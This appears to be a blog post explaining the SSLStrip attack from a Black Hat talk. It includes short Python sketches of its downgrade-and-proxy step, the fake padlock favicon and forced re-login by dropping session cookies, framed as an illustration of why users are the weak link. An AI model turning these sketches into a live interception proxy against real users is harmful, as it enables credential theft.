Not a week goes by without some new problem surfacing in day-to-day communication security. The newest stems from a Black Hat talk by Moxie Marlinspike of thoughtcrime.org. This attack is not sky-is-falling, immediate-action-required bad, but is instead of the depressingly preventable variety. Moxie’s new attack is actually quite elegant and has a retro vibe to it, exploiting the most vulnerable link in any security chain: the user.
His setup for the attack examines website design as it relates to SSL security. He observes that users do not type HTTPS; rather, they encounter it from HTTP, such as login boxes which post to HTTPS URLs. Separating the feedback mechanisms into positive and negative, he also notes that failing to trigger the positive mechanisms (little locks, changing colored address bars, etc.) is not so bad, since users rarely notice their absence, while triggering negative mechanisms (invalid security certificate, problem encountered with the website’s certificate, etc.) is a game killer.
Moxie introduces a new tool, SSLStrip, which acts as a man-in-the-middle attack with a twist. The attack does not compromise SSL itself; instead it monitors HTTP traffic, noting and switching all the HTTPS references to HTTP, and waits. When a request is made for a stripped URL, the attacker proxies it: it requests the proper secure site via HTTPS, using the information the client posted over HTTP, then returns the data unencrypted to the client. With a properly secured HTTPS connection this cannot occur, because the attacker can neither read the information transmitted between client and server nor act as the server, since it lacks the server’s private key to set up the connection.
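To make the stripping step concrete, here is a minimal sketch of the core trick in Python. This is not Moxie’s actual tool; the class and method names are hypothetical, and a real proxy would of course sit on the wire rather than operate on strings. The idea is simply: rewrite secure links in relayed pages, and remember which URLs were downgraded so requests for them can be re-upgraded on the server side.

```python
import re

class StripProxy:
    """Illustrative sketch of SSLStrip's core idea (not the real tool)."""

    def __init__(self):
        self.stripped = set()  # URLs we have downgraded to plain HTTP

    def rewrite_response(self, html):
        """Replace every https:// link with http:// and record it."""
        def downgrade(match):
            insecure = "http://" + match.group(0)[len("https://"):]
            self.stripped.add(insecure)
            return insecure
        return re.sub(r"""https://[^\s"'<>]+""", downgrade, html)

    def upstream_url(self, requested):
        """If the client asks for a URL we stripped, fetch it over HTTPS."""
        if requested in self.stripped:
            return "https://" + requested[len("http://"):]
        return requested
```

So the client sees `<a href="http://bank.example/login">` where the server sent `https://`, follows the plain-HTTP link, and the proxy quietly talks HTTPS to the real site on its behalf.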
From a technical perspective this attack is a non-issue; it does not compromise SSL in any way. So why does it work? Users are not dependable, not knowledgeable, and not paranoid enough to consistently check the security of their connections before posting sensitive information. The attack results in the website being displayed without the “positive” feedback mechanisms; had it been left there, it still would have been a dangerous attack on the gullibility of end users, but Moxie added a few more twists that are very witty. Because users expect to see little locks, he decided to give them one. Have you heard of a favicon? Take a look at the left of your address bar: see the little icon next to my URL? It is a tiny 16×16 icon graphic which I place in the root directory of the site. Your browser asks for this from every site you visit and displays it like a little brand. Moxie rewrites the favicon requests for “secure” websites he proxies and replaces them with a lock graphic. To the casual user it looks like a positive feedback mechanism for a secure site. Ha!
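The favicon twist amounts to one conditional in the proxy. A hypothetical sketch (the function name, signature, and hosts set are my own illustration, not SSLStrip’s code):

```python
def serve_favicon(host, path, proxied_hosts, lock_icon, fetch_upstream):
    """Sketch of the favicon swap: when a browser asks for the icon of a
    site we are stripping, hand back a padlock image so the page gets
    'branded' with a little lock. All names here are illustrative."""
    if path == "/favicon.ico" and host in proxied_hosts:
        return lock_icon               # fake positive feedback: a lock
    return fetch_upstream(host, path)  # everything else passes through
```

The browser dutifully displays whatever bytes come back, so a user glancing for “the little lock” sees one, just not the one they think.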
The attack also has a nice solution for dealing with sessions. It waits like a trapdoor spider for a length of time (to avoid the suspicion aroused by killing recently logged-in sessions) and then springs into action, killing older sessions and thus forcing the user to log in again over the insecure connection. The insecure login, of course, can then be recorded in plain text by the attacker.
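The trapdoor-spider delay can be sketched as a header filter on the proxied requests. Again this is my own hypothetical illustration of the idea, not the tool’s code; stripping the session cookie once it is old enough makes the server treat the user as logged out and present a fresh login form over the stripped connection.

```python
import time

def filter_request_headers(headers, session_first_seen, grace_seconds=600,
                           now=time.time):
    """Sketch: leave fresh sessions alone, but drop the session cookie
    from requests once the session is old enough, forcing a re-login.
    (Names and the 600-second grace period are illustrative.)"""
    if now() - session_first_seen > grace_seconds:
        headers = dict(headers)            # don't mutate the caller's copy
        headers.pop("Cookie", None)        # no cookie -> server shows login
    return headers
```

Waiting out the grace period is what keeps the attack quiet: a session that dies seconds after login invites suspicion, while one that expires an hour later just looks like a timeout.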
Curiously, the slide set notes some strange behaviour from the sites themselves. Some “secure” login boxes display little lock symbols which do not change when the site is no longer secure. It reminds me of a quote from Paranoia, “You are in error. No one is screaming.” Despite evidence to the contrary, the user is easily led into a false sense of security by a little lock which does not actually function the way it is expected to.
The whole affair also reminds me of a passage in the book Cyberpunk: Outlaws and Hackers on the Computer Frontier. My memory is a little fuzzy, since I have not read the book since high school, but as I recall the passage was a parable about security and the fragility of the human link. Much of the book involved social engineering rather than technical exploits, and the parable laid out a physically secure server with only a modem link for communication, a password of sufficient length and complexity, and a single general who held the password. That scenario is effectively the pinnacle of achievable security. Now, so the story went, add a second general with access to the password; by adding this second person you halve the security of the system. The second general introduces social engineering attack vectors: the attacker could pose as the secretary of general 1 and tell general 2 that the first general has forgotten the password and is asking for it, and vice versa, with the attacker pretending to be general 2’s secretary. The point of the parable was that no matter how technologically secure a system is, its weakest point is the user. The presentation from Black Hat is another example of this reality.
And so, I close with another pertinent quote from Paranoia:
Stay Alert! Trust No One! Keep Your Laser Handy!